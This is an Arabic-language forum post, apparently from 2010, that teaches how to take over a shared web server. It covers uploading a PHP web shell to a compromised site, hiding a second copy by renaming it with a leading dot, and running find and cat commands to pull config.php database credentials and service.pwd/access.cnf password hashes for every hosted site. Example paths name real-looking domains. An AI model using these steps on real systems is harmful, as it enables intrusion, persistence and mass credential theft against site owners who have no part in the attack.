منتدى طقس الاردن

اهلا وسهلا اخي الزائر الكريم في منتداك طقس الاردن
منتدى طقس الاردن

كن اول من يعلم بحالة الطقس


    طرق اختراق السيرفرات....

    شاطر

    Admin
    Admin
    Admin

    عدد المساهمات : 13
    نقاط : 4497
    السٌّمعَة : 0
    تاريخ التسجيل : 28/10/2010

    طرق اختراق السيرفرات....

    مُساهمة  Admin في الخميس أكتوبر 28, 2010 1:46 pm

    طريقة اختراق السيرفرات ..


    نفترض انك اخترقت موقع باي ثغره.. او عندك انت موقع لك عند اي سيرفر..


    وتبي تخترق السيرفر.. فهذي بسيطه جدا جدا


    قم بتحميل سكربت الشيل بلغة php على جهازك

    وهذي وصلة الشيل.. (( متطور )) لا يمكنك روئية الرابط الا بعد الرد على الموضوع

    ------------------------------------------------------------------------------

    بسم الله نبدأ في الشرح ::--


    البي اتش بي شيل ((phpshell )) هو سكربت بلغة (( php ))


    وتستطيع من خلاله تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع التي على السيرفر وايضا قرائة الملف الــ config

    للتي على السيرفر..


    ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell

    على موقعك او الموقع الذي اخترقته..


    ومن بعد التحميل سوف تستطيع ان تخترق السيرفر كاملا ..


    وللتوضيح اكثر..


    نفترض انك اخترقت الموقع لا يمكنك روئية الرابط الا بعد الرد على الموضوع وقمت بتحميل الــ phpshell

    على ملف download

    فسيصبح العنوان لا يمكنك روئية الرابط الا بعد الرد على الموضوع


    وثم اذا دخلنا الى العنوان سوف نجد كلمة اسمها Command وامامها فراغ


    في الفراغ هذا سوف نضع فيه اوامر اللينكس..


    ولاكن قبل البدء في الشرح الجدي.. احب اوضح نقطه مهمه ::--


    يمكن لو شاف صاحب الموقع الشيل.. يروح ويحذفه لك وثم تتورط..


    ولاكن لو نسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي

    لاخفاءه نسوي كذا بالطريقة هذي لا يمكنك روئية الرابط الا بعد الرد على الموضوع wget

    وثم نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php

    ماذا تلاحظ ؟ لقط اضفنا نقطة . واذا حذف الاول راح يكون معانا ثاني ومخفي بعد..


    ---------------------------------------------

    ندخل الى موضوعنا


    والان بعد تحميل الشيل على الموقع

    يصبح العنوان مثلا لا يمكنك روئية الرابط الا بعد الرد على الموضوع


    وثم نجد كتابة اسمها Command وامامها فراغ


    في الفراغ هذا ندخل اوامر اللينكس عليه..


    وندخل الامر هذا مثلا ls /var/named

    وهو لاحضار جميع المواقع التي على السيرفر..


    ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ سيف مود

    ((safe mode))

    =============---==-- شرح الاوامر --==--==============

    الان سوف اعلمك طريقة سحب : قواعد البيانات - المواقع - الباسوردات


    نبدأ من الاسهل حتى الاصعب.. (( كلها سهله لاكن بالباسوردات ))


    1- قواعد البيانات

    اكتب هذا الامر امام النص Command في الفراغ المقابل له


    اكتب هذا الامر

    find / -name config.php

    الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا :

    usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php

    usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php

    usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php

    usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php

    (( المواقع التي على السيرفر قليله جدا جدا وعدد المواقع يكون على حسب عدد المواقع التي على السيرفر.. وانا عادة يخرج لي 300 موقع ))

    ونلاحظ ان التي باللون الزهري هي الموقع..


    طيب نبي نقرأ الي متكوب داخل الملف هذا

    usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php

    ونلاحظ ان الموقع هو لا يمكنك روئية الرابط الا بعد الرد على الموضوع والمنتدى من نوعية phpBB


    المهم نبي نقرأ الي بداخله.. نكتب الامر هذا

    cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php


    وثم راح يطلع لك ملف الــ config.php

    وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات


    روح طير للمنتدي وثم لملف الــ admin ودخل اليوزر نيم والباسورد لقاعدة البيانات

    او الدخول له عبر برنامج الــ MySQL-Front_2.5_Setup


    -------------------------------------------------------

    الان انتهينا من قاعدة البيانات باقي باسوردات المواقع..


    اكتب امام Command في الفراغ نكتب هذا الامر

    find / -name service.pwd


    وراح يطلع لنا المواقع بالشكل ذا :

    usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd

    usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd

    usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd

    usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd

    التي باللون الزهري هي المواقع...

    طيب الان ابي استعرض الباسورد للموقع

    usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd

    راح نكتب الامر هذا


    cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd


    وراح يجينا الباسورد للموقع ومشفر بمقياس DES


    ----------------------------------------------------------

    طيب يوجد طريقة اخرى افضل من ذلك


    نكتب الامر هذا

    cat /home/*/public_html/_vti_pvt/service.pwd

    او

    cat /home/*/public_html/_vti_pvt/access.cnf


    وراح يجينا الباسوردات لكل المواقع..

      الوقت/التاريخ الآن هو الأحد ديسمبر 04, 2016 11:17 am